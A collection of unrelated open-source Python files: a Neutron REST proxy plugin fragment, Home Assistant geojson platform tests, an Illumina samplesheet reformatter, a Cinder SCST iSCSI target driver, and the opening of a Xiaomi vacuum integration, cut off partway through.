raise RemoteRestError(ret[2])
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to update remote "
"network: %s"), e.message)
raise
def _map_state_and_status(self, resource):
resource = copy.copy(resource)
resource['state'] = ('UP' if resource.pop('admin_state_up',
True) else 'DOWN')
if 'status' in resource:
del resource['status']
return resource
def _warn_on_state_status(self, resource):
if resource.get('admin_state_up', True) is False:
LOG.warning(_("Setting admin_state_up=False is not supported"
" in this plugin version. Ignoring setting for "
"resource: %s"), resource)
if 'status' in resource:
if resource['status'] is not const.NET_STATUS_ACTIVE:
LOG.warning(_("Operational status is internally set by the"
" plugin. Ignoring setting status=%s."),
resource['status'])
def _get_router_intf_details(self, context, intf_id, subnet_id):
# we will use the network id as interface's id
net_id = intf_id
network = super(NeutronRestProxyV2, self).get_network(context,
net_id)
subnet = super(NeutronRestProxyV2, self).get_subnet(context,
subnet_id)
mapped_network = self._get_mapped_network_with_subnets(network)
mapped_subnet = self._map_state_and_status(subnet)
data = {
'id': intf_id,
"network": mapped_network,
"subnet": mapped_subnet
}
return data
def _extend_port_dict_binding(self, context, port):
cfg_vif_type = cfg.CONF.NOVA.vif_type.lower()
if not cfg_vif_type in (portbindings.VIF_TYPE_OVS,
portbindings.VIF_TYPE_IVS):
LOG.warning(_("Unrecognized vif_type in configuration "
"[%s]. Defaulting to ovs. "),
cfg_vif_type)
cfg_vif_type = portbindings.VIF_TYPE_OVS
hostid = porttracker_db.get_port_hostid(context,
port.get("device_id"))
if hostid:
override = self._check_hostvif_override(hostid)
if override:
cfg_vif_type = override
port[portbindings.VIF_TYPE] = cfg_vif_type
port[portbindings.CAPABILITIES] = {
portbindings.CAP_PORT_FILTER:
'security-group' in self.supported_extension_aliases}
return port
def _check_hostvif_override(self, hostid):
for v in cfg.CONF.NOVA.vif_types:
if hostid in getattr(cfg.CONF.NOVA, "node_override_vif_" + v, []):
return v
return False
|
|
"""The tests for the geojson platform."""
from asynctest.mock import patch, MagicMock, call
from homeassistant.components import geo_location
from homeassistant.components.geo_location import ATTR_SOURCE
from homeassistant.components.geo_json_events.geo_location import \
SCAN_INTERVAL, ATTR_EXTERNAL_ID, SIGNAL_DELETE_ENTITY, SIGNAL_UPDATE_ENTITY
from homeassistant.const import CONF_URL, EVENT_HOMEASSISTANT_START, \
CONF_RADIUS, ATTR_LATITUDE, ATTR_LONGITUDE, ATTR_FRIENDLY_NAME, \
ATTR_UNIT_OF_MEASUREMENT, CONF_LATITUDE, CONF_LONGITUDE
from homeassistant.helpers.dispatcher import DATA_DISPATCHER
from homeassistant.setup import async_setup_component
from tests.common import assert_setup_component, async_fire_time_changed
import homeassistant.util.dt as dt_util
URL = 'http://geo.json.local/geo_json_events.json'
CONFIG = {
geo_location.DOMAIN: [
{
'platform': 'geo_json_events',
CONF_URL: URL,
CONF_RADIUS: 200
}
]
}
CONFIG_WITH_CUSTOM_LOCATION = {
geo_location.DOMAIN: [
{
'platform': 'geo_json_events',
CONF_URL: URL,
CONF_RADIUS: 200,
CONF_LATITUDE: 15.1,
CONF_LONGITUDE: 25.2
}
]
}
def _generate_mock_feed_entry(external_id, title, distance_to_home,
coordinates):
"""Construct a mock feed entry for testing purposes."""
feed_entry = MagicMock()
feed_entry.external_id = external_id
feed_entry.title = title
feed_entry.distance_to_home = distance_to_home
feed_entry.coordinates = coordinates
return feed_entry
async def test_setup(hass):
"""Test the general setup of the platform."""
# Set up some mock feed entries for this test.
mock_entry_1 = _generate_mock_feed_entry(
'1234', 'Title 1', 15.5, (-31.0, 150.0))
mock_entry_2 = _generate_mock_feed_entry(
'2345', 'Title 2', 20.5, (-31.1, 150.1))
mock_entry_3 = _generate_mock_feed_entry(
'3456', 'Title 3', 25.5, (-31.2, 150.2))
mock_entry_4 = _generate_mock_feed_entry(
'4567', 'Title 4', 12.5, (-31.3, 150.3))
# Patching 'utcnow' to gain more control over the timed update.
utcnow = dt_util.utcnow()
with patch('homeassistant.util.dt.utcnow', return_value=utcnow), \
patch('geojson_client.generic_feed.GenericFeed') as mock_feed:
mock_feed.return_value.update.return_value = 'OK', [mock_entry_1,
mock_entry_2,
mock_entry_3]
with assert_setup_component(1, geo_location.DOMAIN):
assert await async_setup_component(
hass, geo_location.DOMAIN, CONFIG)
# Artificially trigger update.
hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
# Collect events.
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 3
state = hass.states.get("geo_location.title_1")
assert state is not None
assert state.name == "Title 1"
assert state.attributes == {
ATTR_EXTERNAL_ID: "1234", ATTR_LATITUDE: -31.0,
ATTR_LONGITUDE: 150.0, ATTR_FRIENDLY_NAME: "Title 1",
ATTR_UNIT_OF_MEASUREMENT: "km",
ATTR_SOURCE: 'geo_json_events'}
assert round(abs(float(state.state)-15.5), 7) == 0
state = hass.states.get("geo_location.title_2")
assert state is not None
assert state.name == "Title 2"
assert state.attributes == {
ATTR_EXTERNAL_ID: "2345", ATTR_LATITUDE: -31.1,
ATTR_LONGITUDE: 150.1, ATTR_FRIENDLY_NAME: "Title 2",
ATTR_UNIT_OF_MEASUREMENT: "km",
ATTR_SOURCE: 'geo_json_events'}
assert round(abs(float(state.state)-20.5), 7) == 0
state = hass.states.get("geo_location.title_3")
assert state is not None
assert state.name == "Title 3"
assert state.attributes == {
ATTR_EXTERNAL_ID: "3456", ATTR_LATITUDE: -31.2,
ATTR_LONGITUDE: 150.2, ATTR_FRIENDLY_NAME: "Title 3",
ATTR_UNIT_OF_MEASUREMENT: "km",
ATTR_SOURCE: 'geo_json_events'}
assert round(abs(float(state.state)-25.5), 7) == 0
# Simulate an update - one existing, one new entry,
# one outdated entry
mock_feed.return_value.update.return_value = 'OK', [
mock_entry_1, mock_entry_4, mock_entry_3]
async_fire_time_changed(hass, utcnow + SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 3
# Simulate an update - empty data, but successful update,
# so no changes to entities.
mock_feed.return_value.update.return_value = 'OK_NO_DATA', None
async_fire_time_changed(hass, utcnow + 2 * SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 3
# Simulate an update - empty data, removes all entities
mock_feed.return_value.update.return_value = 'ERROR', None
async_fire_time_changed(hass, utcnow + 3 * SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 0
async def test_setup_with_custom_location(hass):
"""Test the setup with a custom location."""
# Set up some mock feed entries for this test.
mock_entry_1 = _generate_mock_feed_entry(
'1234', 'Title 1', 2000.5, (-31.1, 150.1))
with patch('geojson_client.generic_feed.GenericFeed') as mock_feed:
mock_feed.return_value.update.return_value = 'OK', [mock_entry_1]
with assert_setup_component(1, geo_location.DOMAIN):
assert await async_setup_component(
hass, geo_location.DOMAIN, CONFIG_WITH_CUSTOM_LOCATION)
# Artificially trigger update.
hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
# Collect events.
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 1
assert mock_feed.call_args == call(
(15.1, 25.2), URL, filter_radius=200.0)
async def test_setup_race_condition(hass):
"""Test a particular race condition experienced."""
# 1. Feed returns 1 entry -> Feed manager creates 1 entity.
# 2. Feed returns error -> Feed manager removes 1 entity.
# However, this stayed on and kept listening for dispatcher signals.
# 3. Feed returns 1 entry -> Feed manager creates 1 entity.
# 4. Feed returns 1 entry -> Feed manager updates 1 entity.
# Internally, the previous entity is updating itself, too.
# 5. Feed returns error -> Feed manager removes 1 entity.
# There are now 2 entities trying to remove themselves from HA, but
# the second attempt fails of course.
# Set up some mock feed entries for this test.
mock_entry_1 = _generate_mock_feed_entry(
'1234', 'Title 1', 15.5, (-31.0, 150.0))
delete_signal = SIGNAL_DELETE_ENTITY.format('1234')
update_signal = SIGNAL_UPDATE_ENTITY.format('1234')
# Patching 'utcnow' to gain more control over the timed update.
utcnow = dt_util.utcnow()
with patch('homeassistant.util.dt.utcnow', return_value=utcnow), \
patch('geojson_client.generic_feed.GenericFeed') as mock_feed:
with assert_setup_component(1, geo_location.DOMAIN):
assert await async_setup_component(
hass, geo_location.DOMAIN, CONFIG)
mock_feed.return_value.update.return_value = 'OK', [mock_entry_1]
# Artificially trigger update.
hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
# Collect events.
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 1
assert len(hass.data[DATA_DISPATCHER][delete_signal]) == 1
assert len(hass.data[DATA_DISPATCHER][update_signal]) == 1
# Simulate an update - empty data, removes all entities
mock_feed.return_value.update.return_value = 'ERROR', None
async_fire_time_changed(hass, utcnow + SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 0
assert len(hass.data[DATA_DISPATCHER][delete_signal]) == 0
assert len(hass.data[DATA_DISPATCHER][update_signal]) == 0
# Simulate an update - 1 entry
mock_feed.return_value.update.return_value = 'OK', [mock_entry_1]
async_fire_time_changed(hass, utcnow + 2 * SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 1
assert len(hass.data[DATA_DISPATCHER][delete_signal]) == 1
assert len(hass.data[DATA_DISPATCHER][update_signal]) == 1
# Simulate an update - 1 entry
mock_feed.return_value.update.return_value = 'OK', [mock_entry_1]
async_fire_time_changed(hass, utcnow + 3 * SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 1
assert len(hass.data[DATA_DISPATCHER][delete_signal]) == 1
assert len(hass.data[DATA_DISPATCHER][update_signal]) == 1
# Simulate an update - empty data, removes all entities
mock_feed.return_value.update.return_value = 'ERROR', None
async_fire_time_changed(hass, utcnow + 4 * SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 0
# Ensure that delete and update signal targets are now empty.
assert len(hass.data[DATA_DISPATCHER][delete_signal]) == 0
assert len(hass.data[DATA_DISPATCHER][update_signal]) == 0
|
|
import re
import pandas as pd
from igf_data.illumina.samplesheet import SampleSheet
from igf_data.utils.sequtils import rev_comp
from igf_data.process.metadata_reformat.reformat_metadata_file import Reformat_metadata_file
SAMPLESHEET_COLUMNS = [
'Lane',
'Sample_ID',
'Sample_Name',
'Sample_Plate',
'Sample_Well',
'I7_Index_ID',
'index',
'I5_Index_ID',
'index2',
'Sample_Project',
'Description',
'Pool_Number'
]
class Reformat_samplesheet_file:
'''
A class for reformatting samplesheet file
:param infile: Input samplesheet file
:param file_format: Input file format, default samplesheet
List of allowed formats
* samplesheet
* csv
:param samplesheet_columns: A list of expected columns in the samplesheet file
A list of default columns
* Lane
* Sample_ID
* Sample_Name
* Sample_Plate
* Sample_Well
* I7_Index_ID
* index
* Sample_Project
* Description
* Pool_number
:param remove_adapters: A toggle for removing adapters from header section ,default False
:param revcomp_index1: A toggle for reverse complementing index1 column, default False
:param revcomp_index2: A toggle for reverse complementing index2 column, default False
:param tenx_label: Description label for 10x experiments, default '10X'
:param sample_id: Sample id column name, default 'Sample_ID'
:param sample_name: Sample name column name, default 'Sample_Name'
:param index: I7 index column name, default 'index'
:param index2: I5 index column name, default 'index2'
:param sample_project: Project name column name, default 'Sample_Project'
:param description: Description column name, default 'Description'
:param adapter_section: Adapter section name in header, default 'Settings'
:param adapter_keys: A list of adapter keys to be removed from samplesheet header, default ('Adapter','AdapterRead2')
'''
def __init__(self,infile,
file_format='samplesheet',
samplesheet_columns=SAMPLESHEET_COLUMNS,
remove_adapters=False,
revcomp_index1=False,
revcomp_index2=False,
tenx_label='10X',
sample_id='Sample_ID',
sample_name='Sample_Name',
index='index',
index2='index2',
sample_project='Sample_Project',
description='Description',
adapter_section='Settings',
adapter_keys=('Adapter','AdapterRead2')):
try:
self.infile = infile
if file_format not in ['samplesheet','csv']:
raise ValueError('File format {0} not supported'.format(file_format))
self.file_format = file_format
self.samplesheet_columns = samplesheet_columns
self.tenx_label = tenx_label
self.remove_adapters = remove_adapters
self.revcomp_index1 = revcomp_index1
self.revcomp_index2 = revcomp_index2
self.sample_id = sample_id
self.sample_name = sample_name
self.index = index
self.index2 = index2
self.sample_project = sample_project
self.description = description
self.adapter_section = adapter_section
self.adapter_keys = adapter_keys
except Exception as e:
raise ValueError('Error in initializing samplesheet reformatting, error: {0}'.\
format(e))
@staticmethod
def detect_tenx_barcodes(index,tenx_label='10X'):
'''
A static method for checking 10X I7 index barcodes
:param index: I7 index string
:param tenx_label: A string description for 10X samples, default, '10X'
:returns: A string
'''
try:
description = ''
pattern = re.compile(r'SI-[GN]A-[A-H]\d+',re.IGNORECASE)
if re.match(pattern,index):
description = tenx_label
return description
except Exception as e:
raise ValueError('Failed to detect Tenx single cell barcode for index {0}, error: {1}'.\
format(index,e))
def correct_samplesheet_data_row(self,row):
'''
A method for correcting samplesheet data row
:param row: A Pandas Series
:returns: A Pandas Series
'''
try:
if not isinstance(row,pd.Series):
raise TypeError('Expecting A pandas series and got {0}'.\
format(type(row)))
if self.sample_id in row.keys():
row[self.sample_id] = \
Reformat_metadata_file.\
sample_and_project_reformat(row[self.sample_id]) # refoemat sample id
if self.sample_project in row.keys():
row[self.sample_project] = \
Reformat_metadata_file.\
sample_and_project_reformat(row[self.sample_project]) # refoemat project name
if self.sample_name in row.keys():
row[self.sample_name] = \
Reformat_metadata_file.\
sample_name_reformat(row[self.sample_name]) # refoemat sample name
if self.index in row.keys() and \
self.description in row.keys():
row[self.description] = \
self.detect_tenx_barcodes(\
index=row[self.index],
tenx_label=self.tenx_label) # add description label for 10x samples
if self.index in row.keys() and \
self.description in row.keys() and \
(row[self.index]!='' or row[self.index] is not None ) and \
row[self.description] != self.tenx_label:
row[self.index] = row[self.index].upper()
if self.revcomp_index1:
row[self.index] = rev_comp(row[self.index]) # revcomp index 1
if self.index2 in row.keys() and \
(row[self.index2]!='' or row[self.index2] is not None ):
row[self.index2] = row[self.index2].upper()
if self.revcomp_index2:
row[self.index2] = rev_comp(row[self.index2]) # revcomp index 2
if self.description in row.keys() and \
(row[self.description] !='' or \
row[self.description] is not None):
row[self.description] = row[self.description].upper() # change description to upper case letters
return row
except Exception as e:
raise ValueError('Failed to correct samplesheet data row {0},error {1}'.\
format(row,e))
def reformat_raw_samplesheet_file(self,output_file):
'''
A method for refoematting raw samplesheet file
:param output_file: An output file path
:returns: None
'''
try:
samplesheet_data = list()
if self.file_format == 'samplesheet':
samplesheet = SampleSheet(infile=self.infile)
samplesheet_data = pd.DataFrame(samplesheet._data)
elif self.file_format == 'csv':
samplesheet_data = pd.read_csv(self.infile,header=0,dtype=object)
samplesheet_data.fillna('',inplace=True)
samplesheet_data = \
samplesheet_data.\
apply(\
lambda row: self.correct_samplesheet_data_row(row=row),
axis=1,
result_type='reduce') # refoemat samplesheet data
column_names = \
[column_name \
for column_name in samplesheet_data.columns \
if column_name in self.samplesheet_columns ] # filter expected column names
if len(column_names) == 0:
raise ValueError('No expected columns found on the samplesheet data')
samplesheet_data = samplesheet_data[column_names] # filter samplesheet data
if self.file_format == 'samplesheet':
samplesheet._data = \
samplesheet_data.\
to_dict(orient='records') # update samplesheet object with new data
if self.remove_adapters:
for adapter_key in self.adapter_keys:
samplesheet.\
modify_sample_header(\
section=self.adapter_section,
type='remove',
condition_key=adapter_key) # remove adapters from samplesheet
samplesheet.print_sampleSheet(outfile=output_file) # print corrected samplesheet
elif self.file_format == 'csv':
samplesheet_data.to_csv(output_file,index=False) # dump samplesheet dat as csv file
except Exception as e:
raise ValueError('Failed to reformat samplesheet file {0}, error {1}'.\
format(self.infile,e))
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_concurrency import processutils as putils
from cinder import exception
from cinder import utils
from cinder.i18n import _, _LE
from cinder.openstack.common import log as logging
from cinder.volume.targets import iscsi
from cinder.volume import utils as vutils
LOG = logging.getLogger(__name__)
class SCSTAdm(iscsi.ISCSITarget):
def __init__(self, *args, **kwargs):
super(SCSTAdm, self).__init__(*args, **kwargs)
self.volumes_dir = self.configuration.safe_get('volumes_dir')
self.iscsi_target_prefix = self.configuration.safe_get(
'iscsi_target_prefix')
self.target_name = self.configuration.safe_get('scst_target_iqn_name')
self.target_driver = self.configuration.safe_get('scst_target_driver')
self.chap_username = self.configuration.safe_get('chap_username')
self.chap_password = self.configuration.safe_get('chap_password')
self.initiator_iqn = None
self.remove_initiator_iqn = None
def scst_execute(self, *args):
return utils.execute('scstadmin', *args, run_as_root=True)
def validate_connector(self, connector):
# iSCSI drivers require the initiator information
if 'initiator' not in connector:
err_msg = _('The volume driver requires the iSCSI initiator '
'name in the connector.')
LOG.error(err_msg)
raise exception.VolumeBackendAPIException(data=err_msg)
self.initiator_iqn = connector['initiator']
def terminate_connection(self, volume, connector, **kwargs):
self.remove_initiator_iqn = connector['initiator']
def _get_target(self, iqn):
(out, _err) = self.scst_execute('-list_target')
if iqn in out:
return self._target_attribute(iqn)
return None
def _target_attribute(self, iqn):
(out, _err) = self.scst_execute('-list_tgt_attr', iqn,
'-driver', self.target_driver)
lines = out.split('\n')
for line in lines:
if "rel_tgt_id" in line:
parsed = line.split()
return parsed[1]
def _get_group(self):
scst_group = "%s%s" % (self.initiator_iqn, self.target_name)
(out, _err) = self.scst_execute('-list_group')
if scst_group in out:
return out
return None
def _get_luns_info(self):
scst_group = "%s%s" % (self.initiator_iqn, self.target_name)
(out, _err) = self.scst_execute('-list_group', scst_group,
'-driver', self.target_driver,
'-target', self.target_name)
first = "Assigned LUNs:"
last = "Assigned Initiators:"
start = out.index(first) + len(first)
end = out.index(last, start)
out = out[start:end]
luns = []
for line in out.strip().split("\n")[2:]:
luns.append(int(line.strip().split(" ")[0]))
luns = sorted(set(luns))
return luns
def _get_target_and_lun(self, context, volume):
iscsi_target = 0
if not self.target_name or not self._get_group():
lun = 1
return iscsi_target, lun
luns = self._get_luns_info()
if (not luns) or (luns[0] != 1):
lun = 1
return iscsi_target, lun
else:
for lun in luns:
if (luns[-1] == lun) or (luns[lun - 1] + 1 != luns[lun]):
return iscsi_target, (lun + 1)
def create_iscsi_target(self, name, vol_id, tid, lun, path,
chap_auth=None):
scst_group = "%s%s" % (self.initiator_iqn, self.target_name)
vol_name = path.split("/")[3]
try:
(out, _err) = self.scst_execute('-noprompt',
'-set_drv_attr',
self.target_driver,
'-attributes',
'enabled=1')
LOG.debug('StdOut from set driver attribute: %s', out)
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to set attribute for enable target driver "
"%s"), e)
raise exception.ISCSITargetHelperCommandFailed(
error_message="Failed to enable SCST Target driver.")
if self._get_target(name) is None:
try:
(out, _err) = self.scst_execute('-add_target', name,
'-driver', self.target_driver)
LOG.debug("StdOut from scstadmin create target: %s", out)
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to create iscsi target for volume "
"id:%(vol_id)s: %(e)s"), {'vol_id': name, 'e': e})
raise exception.ISCSITargetCreateFailed(volume_id=vol_name)
try:
(out, _err) = self.scst_execute('-enable_target', name,
'-driver', self.target_driver)
LOG.debug("StdOut from scstadmin enable target: %s", out)
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to set 'enable' attribute for "
"SCST target %s"), e)
raise exception.ISCSITargetHelperCommandFailed(
error_mesage="Failed to enable SCST Target.")
if chap_auth and self.target_name:
try:
chap_string = self._iscsi_authentication('IncomingUser=',
*chap_auth)
(out, _err) = self.scst_execute('-noprompt',
'-set_tgt_attr', name,
'-driver',
self.target_driver,
'-attributes',
chap_string)
LOG.debug("StdOut from scstadmin set target attribute:"
" %s.", out)
except putils.ProcessExecutionError:
msg = _("Failed to set attribute 'Incoming user' for "
"SCST target.")
LOG.exception(msg)
raise exception.ISCSITargetHelperCommandFailed(
error_mesage=msg)
if self.target_name:
if self._get_group() is None:
try:
(out, _err) = self.scst_execute('-add_group', scst_group,
'-driver',
self.target_driver,
'-target', name)
LOG.debug("StdOut from scstadmin create group: %s", out)
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to create group to SCST target "
"%s"), e)
raise exception.ISCSITargetHelperCommandFailed(
error_message="Failed to create group to SCST target.")
try:
(out, _err) = self.scst_execute('-add_init',
self.initiator_iqn,
'-driver', self.target_driver,
'-target', name,
'-group', scst_group)
LOG.debug("StdOut from scstadmin add initiator: %s", out)
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to add initiator to group "
" for SCST target %s"), e)
raise exception.ISCSITargetHelperCommandFailed(
error_message="Failed to add Initiator to group for "
"SCST target.")
tid = self._get_target(name)
if self.target_name is None:
disk_id = "disk%s" % tid
else:
disk_id = "%s%s" % (lun, vol_id.split('-')[-1])
try:
self.scst_execute('-open_dev', disk_id,
'-handler', 'vdisk_fileio',
'-attributes', 'filename=%s' % path)
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to add device to handler %s"), e)
raise exception.ISCSITargetHelperCommandFailed(
error_message="Failed to add device to SCST handler.")
try:
if self.target_name:
self.scst_execute('-add_lun', lun,
'-driver', self.target_driver,
'-target', name,
'-device', disk_id,
'-group', scst_group)
else:
self.scst_execute('-add_lun', lun,
'-driver', self.target_driver,
'-target', name,
'-device', disk_id)
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to add lun to SCST target "
"id:%(vol_id)s: %(e)s"), {'vol_id': name, 'e': e})
raise exception.ISCSITargetHelperCommandFailed(
error_message="Failed to add LUN to SCST Target for "
"volume " + vol_name)
# SCST uses /etc/scst.conf as the default configuration when it
# starts
try:
self.scst_execute('-write_config', '/etc/scst.conf')
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to write in /etc/scst.conf."))
raise exception.ISCSITargetHelperCommandFailed(
error_message="Failed to write in /etc/scst.conf.")
return tid
def _iscsi_location(self, ip, target, iqn, lun=None):
return "%s:%s,%s %s %s" % (ip, self.configuration.iscsi_port,
target, iqn, lun)
def _get_iscsi_target(self, context, vol_id):
# FIXME(jdg): Need to implement abc method
pass
def _get_target_chap_auth(self, context, iscsi_name):
# FIXME(jdg): Need to implement abc method
if self._get_target(iscsi_name) is None:
return None
(out, _err) = self.scst_execute('-list_tgt_attr', iscsi_name,
'-driver', self.target_driver)
first = "KEY"
last = "Dynamic attributes"
start = out.index(first) + len(first)
end = out.index(last, start)
out = out[start:end]
out = out.split("\n")[2]
if "IncomingUser" in out:
out = out.split(" ")
out = filter(lambda a: a != "", out)
return (out[1], out[2])
else:
return None
def ensure_export(self, context, volume, volume_path):
iscsi_target, lun = self._get_target_and_lun(context, volume)
if self.target_name is None:
iscsi_name = "%s%s" % (self.configuration.iscsi_target_prefix,
volume['name'])
else:
iscsi_name = self.target_name
if self.chap_username and self.chap_password:
chap_auth = (self.chap_username, self.chap_password)
else:
chap_auth = self._get_target_chap_auth(context, iscsi_name)
self.create_iscsi_target(iscsi_name, volume['id'], iscsi_target,
lun, volume_path, chap_auth)
def create_export(self, context, volume, volume_path):
"""Creates an export for a logical volume."""
iscsi_target, lun = self._get_target_and_lun(context, volume)
if self.target_name is None:
iscsi_name = "%s%s" % (self.configuration.iscsi_target_prefix,
volume['name'])
else:
iscsi_name = self.target_name
if self.chap_username and self.chap_password:
chap_auth = (self.chap_username, self.chap_password)
else:
chap_auth = self._get_target_chap_auth(context, iscsi_name)
if not chap_auth:
chap_auth = (vutils.generate_username(),
vutils.generate_password())
tid = self.create_iscsi_target(iscsi_name, volume['id'], iscsi_target,
lun, volume_path, chap_auth)
data = {}
data['location'] = self._iscsi_location(
self.configuration.iscsi_ip_address, tid, iscsi_name, lun)
LOG.debug('Set provider_location to: %s', data['location'])
data['auth'] = self._iscsi_authentication(
'CHAP', *chap_auth)
return data
def remove_export(self, context, volume):
try:
location = volume['provider_location'].split(' ')
iqn = location[1]
iscsi_target = self._get_target(iqn)
self.show_target(iscsi_target, iqn)
except Exception:
LOG.error(_LE("Skipping remove_export. No iscsi_target is"
"presently exported for volume: %s"), volume['id'])
return
vol = self.db.volume_get(context, volume['id'])
lun = "".join(vol['provider_location'].split(" ")[-1:])
self.remove_iscsi_target(iscsi_target, lun,
volume['id'], volume['name'])
def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
disk_id = "%s%s" % (lun, vol_id.split('-')[-1])
vol_uuid_file = vol_name
if self.target_name is None:
iqn = '%s%s' % (self.iscsi_target_prefix, vol_uuid_file)
else:
iqn = self.target_name
if self.target_name is None:
try:
self.scst_execute('-noprompt',
'-rem_target', iqn,
'-driver', 'iscsi')
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to remove iscsi target for volume "
"id:%(vol_id)s: %(e)s"), {'vol_id': vol_id, 'e': e})
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
try:
self.scst_execute('-noprompt',
'-close_dev', "disk%s" % tid,
'-handler', 'vdisk_fileio')
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to close disk device %s"), e)
raise exception.ISCSITargetHelperCommandFailed(
error_message="Failed to close disk device for "
"SCST handler.")
if self._get_target(iqn):
try:
self.scst_execute('-noprompt',
'-rem_target', iqn,
'-driver', self.target_driver)
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to remove iscsi target for "
"volume id:%(vol_id)s: %(e)s"),
{'vol_id': vol_id, 'e': e})
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
else:
if not int(lun) in self._get_luns_info():
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
try:
scst_group = "%s%s" % (self.remove_initiator_iqn,
self.target_name)
self.scst_execute('-noprompt', '-rem_lun', lun,
'-driver', self.target_driver,
'-target', iqn, '-group',
scst_group)
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to remove LUN %s"), e)
raise exception.ISCSITargetHelperCommandFailed(
error_message="Failed to remove LUN for SCST Target.")
try:
self.scst_execute('-noprompt',
'-close_dev', disk_id,
'-handler', 'vdisk_fileio')
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to close disk device %s"), e)
raise exception.ISCSITargetHelperCommandFailed(
error_message="Failed to close disk device for "
"SCST handler.")
self.scst_execute('-write_config', '/etc/scst.conf')
def show_target(self, tid, iqn):
if iqn is None:
raise exception.InvalidParameterValue(
err=_('valid iqn needed for show_target'))
tid = self._get_target(iqn)
if tid is None:
raise exception.ISCSITargetHelperCommandFailed(
error_message="Target not found")
def initialize_connection(self, volume, connector):
iscsi_properties = self._get_iscsi_properties(volume)
return {
'driver_volume_type': 'iscsi',
'data': iscsi_properties
}
|
|
"""
Support for the Xiaomi vacuum cleaner robot.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/vacuum.xiaomi_miio/
"""
import asyncio
from functools import partial
import logging
import os
import voluptuous as vol
from homeassistant.components.vacuum import (
ATTR_CLEANED_AREA, DOMAIN, PLATFORM_SCHEMA, SUPPORT_BATTERY,
SUPPORT_CLEAN_SPOT, SUPPORT_FAN_SPEED, SUPPORT_LOCATE, SUPPORT_PAUSE,
SUPPORT_RETURN_HOME, SUPPORT_SEND_COMMAND, SUPPORT_STATUS, SUPPORT_STOP,
SUPPORT_TURN_OFF, SUPPORT_TURN_ON, VACUUM_SERVICE_SCHEMA, VacuumDevice)
from homeassistant.config import load_yaml_config_file
from homeassistant.const import (
ATTR_ENTITY_ID, CONF_HOST, CONF_NAME, CONF_TOKEN, STATE_OFF, STATE_ON)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['python-miio==0.3.1']
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'Xiaomi Vacuum cleaner'
ICON = 'mdi:google-circles-group'
PLATFORM = 'xiaomi_miio'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}, extra=vol.ALLOW_EXTRA)
SERVICE_MOVE_REMOTE_CONTROL = 'xiaomi_remote_control_move'
SERVICE_MOVE_REMOTE_CONTROL_STEP = 'xiaomi_remote_control_move_step'
SERVICE_START_REMOTE_CONTROL = 'xiaomi_remote_control_start'
SERVICE_STOP_REMOTE_CONTROL = 'xiaomi_remote_control_stop'
FAN_SPEEDS = {
'Quiet': 38,
'Balanced': 60,
'Turbo': 77,
'Max': 90}
ATTR_CLEANING_TIME = 'cleaning_time'
ATTR_DO_NOT_DISTURB = 'do_not_disturb'
ATTR_MAIN_BRUSH_LEFT = 'main_brush_left'
ATTR_SIDE_BRUSH_LEFT = 'side_brush_left'
ATTR_FILTER_LEFT = 'filter_left'
ATTR_CLEANING_COUNT = 'cleaning_count'
ATTR_CLEANED_TOTAL_AREA = 'total_cleaned_area'
ATTR_CLEANING_TOTAL_TIME = 'total_cleaning_time'
ATTR_ERROR = 'error'
ATTR_RC_DURATION = 'duration'
ATTR_RC_ROTATION = 'rotation'
ATTR_RC_VELOCITY = 'velocity'
SERVICE_SCHEMA_REMOTE_CONTROL = VACUUM_SERVICE_SCHEMA.extend({
vol.Optional(ATTR_RC_VELOCITY):
vol.All(vol.Coerce(float), vol.Clamp(min=-0.29, max=0.29)),
vol.Optional(ATTR_RC_ROTATION):
vol.All(vol.Coerce(int), vol.Clamp(min=-179, max=179)),
vol.Optional(ATTR_RC_DURATION): cv.positive_int,
})
SERVICE_TO_METHOD = {
SERVICE_START_REMOTE_CONTROL: {'method': 'async_remote_control_start'},
